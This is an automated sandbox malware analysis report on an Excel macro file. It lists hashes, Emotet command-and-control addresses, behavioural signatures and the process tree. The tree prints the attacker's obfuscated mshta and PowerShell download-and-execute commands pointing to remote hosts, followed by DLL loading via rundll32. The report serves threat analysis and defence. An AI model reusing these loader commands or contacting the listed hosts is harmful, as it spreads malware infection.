Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
19-01-2022 10:06
Behavioral task
behavioral1
Sample
086135335.xlsm
Resource
win7-en-20211208
General
-
Target
086135335.xlsm
-
Size
114KB
-
MD5
254ffcdec7238f1444fe24932ce54457
-
SHA1
f279f9375c94edc055cb29d3d511c2b984eea05a
-
SHA256
bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc
-
SHA512
559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a
Malware Config
Extracted
http://0x5cff39c3/sec/sec.html
Extracted
http://92.255.57.195/sec/sec.png
Extracted
emotet
Epoch5
45.138.98.34:80
69.16.218.101:8080
51.210.242.234:8080
185.148.168.220:8080
142.4.219.173:8080
54.38.242.185:443
191.252.103.16:80
104.131.62.48:8080
62.171.178.147:8080
217.182.143.207:443
168.197.250.14:80
37.44.244.177:8080
66.42.57.149:443
210.57.209.142:8080
159.69.237.188:443
116.124.128.206:8080
128.199.192.135:8080
195.154.146.35:443
185.148.168.15:8080
195.77.239.39:8080
207.148.81.119:8080
85.214.67.203:8080
190.90.233.66:443
78.46.73.125:443
78.47.204.80:443
37.59.209.141:8080
54.37.228.122:443
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2752 1688 cmd.exe EXCEL.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1644-171-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 1316 created 3148 1316 WerFault.exe mshta.exe -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 19 3148 mshta.exe 31 1644 powershell.exe 34 1644 powershell.exe 38 2580 rundll32.exe 39 2580 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exepid process 3764 rundll32.exe 1468 rundll32.exe 1544 rundll32.exe 2580 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1072 3148 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
EXCEL.EXEWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1688 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 1644 powershell.exe 1072 WerFault.exe 1072 WerFault.exe 1644 powershell.exe 2580 rundll32.exe 2580 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1644 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE 1688 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exeWerFault.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 1688 wrote to memory of 2752 1688 EXCEL.EXE cmd.exe PID 1688 wrote to memory of 2752 1688 EXCEL.EXE cmd.exe PID 2752 wrote to memory of 3148 2752 cmd.exe mshta.exe PID 2752 wrote to memory of 3148 2752 cmd.exe mshta.exe PID 3148 wrote to memory of 1644 3148 mshta.exe powershell.exe PID 3148 wrote to memory of 1644 3148 mshta.exe powershell.exe PID 1316 wrote to memory of 3148 1316 WerFault.exe mshta.exe PID 1316 wrote to memory of 3148 1316 WerFault.exe mshta.exe PID 1644 wrote to memory of 3412 1644 powershell.exe cmd.exe PID 1644 wrote to memory of 3412 1644 powershell.exe cmd.exe PID 3412 wrote to memory of 3764 3412 cmd.exe rundll32.exe PID 3412 wrote to memory of 3764 3412 cmd.exe rundll32.exe PID 3412 wrote to memory of 3764 3412 cmd.exe rundll32.exe PID 3764 wrote to memory of 1468 3764 rundll32.exe rundll32.exe PID 3764 wrote to memory of 1468 3764 rundll32.exe rundll32.exe PID 3764 wrote to memory of 1468 3764 rundll32.exe rundll32.exe PID 1468 wrote to memory of 1544 1468 rundll32.exe rundll32.exe PID 1468 wrote to memory of 1544 1468 rundll32.exe rundll32.exe PID 1468 wrote to memory of 1544 1468 rundll32.exe rundll32.exe PID 1544 wrote to memory of 2580 1544 rundll32.exe rundll32.exe PID 1544 wrote to memory of 2580 1544 rundll32.exe rundll32.exe PID 1544 wrote to memory of 2580 1544 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\086135335.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/sec.html3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/sec.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tku",FUBgEnAdK8⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Iowdvjqb\kclggbsegem.tku",DllRegisterServer9⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3148 -s 17244⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 3148 -ip 31481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\ssd.dllMD5
fcdd109bcdb88089e05aa9dda588ec32
SHA12ae8c17b9401869aac6db6ceb087eb24083dc317
SHA256634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
SHA5127d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
-
C:\Users\Public\Documents\ssd.dllMD5
fcdd109bcdb88089e05aa9dda588ec32
SHA12ae8c17b9401869aac6db6ceb087eb24083dc317
SHA256634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
SHA5127d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
-
C:\Users\Public\Documents\ssd.dllMD5
fcdd109bcdb88089e05aa9dda588ec32
SHA12ae8c17b9401869aac6db6ceb087eb24083dc317
SHA256634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
SHA5127d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
-
C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tkuMD5
fcdd109bcdb88089e05aa9dda588ec32
SHA12ae8c17b9401869aac6db6ceb087eb24083dc317
SHA256634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
SHA5127d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
-
C:\Windows\SysWOW64\Iowdvjqb\kclggbsegem.tkuMD5
fcdd109bcdb88089e05aa9dda588ec32
SHA12ae8c17b9401869aac6db6ceb087eb24083dc317
SHA256634a49dc5351f2453022e7f6eebd8e3dbc44ffda315aece868a79416186ce1a8
SHA5127d6256991f7d5e5af907753311e31d64c07e26ccfbdea8e84432db2cc77d5ed7ffd8ff1ccc9683724ac9dd0291237036e1e5b51559034f61e20fad8ef68ab55e
-
memory/1468-185-0x0000000004B30000-0x0000000004B58000-memory.dmpFilesize
160KB
-
memory/1468-194-0x0000000004F70000-0x0000000004F98000-memory.dmpFilesize
160KB
-
memory/1468-191-0x0000000004F10000-0x0000000004F38000-memory.dmpFilesize
160KB
-
memory/1468-189-0x0000000004C90000-0x0000000004CB8000-memory.dmpFilesize
160KB
-
memory/1468-187-0x0000000004C30000-0x0000000004C58000-memory.dmpFilesize
160KB
-
memory/1544-196-0x00000000042A0000-0x00000000042C8000-memory.dmpFilesize
160KB
-
memory/1644-184-0x000001A4D6A70000-0x000001A4D6AE6000-memory.dmpFilesize
472KB
-
memory/1644-168-0x000001A4D63F0000-0x000001A4D6412000-memory.dmpFilesize
136KB
-
memory/1644-169-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmpFilesize
385.4MB
-
memory/1644-171-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmpFilesize
385.4MB
-
memory/1644-173-0x000001A4BE2F0000-0x000001A4D6460000-memory.dmpFilesize
385.4MB
-
memory/1644-174-0x000001A4D69A0000-0x000001A4D69E4000-memory.dmpFilesize
272KB
-
memory/1688-137-0x00007FFF1D810000-0x00007FFF1D820000-memory.dmpFilesize
64KB
-
memory/1688-131-0x00007FFF20070000-0x00007FFF20080000-memory.dmpFilesize
64KB
-
memory/1688-133-0x00007FFF20070000-0x00007FFF20080000-memory.dmpFilesize
64KB
-
memory/1688-130-0x00007FFF20070000-0x00007FFF20080000-memory.dmpFilesize
64KB
-
memory/1688-132-0x00007FFF20070000-0x00007FFF20080000-memory.dmpFilesize
64KB
-
memory/1688-134-0x00007FFF20070000-0x00007FFF20080000-memory.dmpFilesize
64KB
-
memory/1688-138-0x00007FFF1D810000-0x00007FFF1D820000-memory.dmpFilesize
64KB
-
memory/2580-199-0x0000000004CD0000-0x0000000004CF8000-memory.dmpFilesize
160KB
-
memory/2580-203-0x0000000005580000-0x00000000055A8000-memory.dmpFilesize
160KB
-
memory/2580-205-0x00000000055E0000-0x0000000005608000-memory.dmpFilesize
160KB
-
memory/2580-207-0x0000000005780000-0x00000000057A8000-memory.dmpFilesize
160KB
-
memory/2580-209-0x00000000057E0000-0x0000000005808000-memory.dmpFilesize
160KB
-
memory/2580-211-0x00000000058E0000-0x0000000005908000-memory.dmpFilesize
160KB
-
memory/2580-213-0x00000000059C0000-0x00000000059E8000-memory.dmpFilesize
160KB
-
memory/3764-177-0x0000000004DA0000-0x0000000004DC8000-memory.dmpFilesize
160KB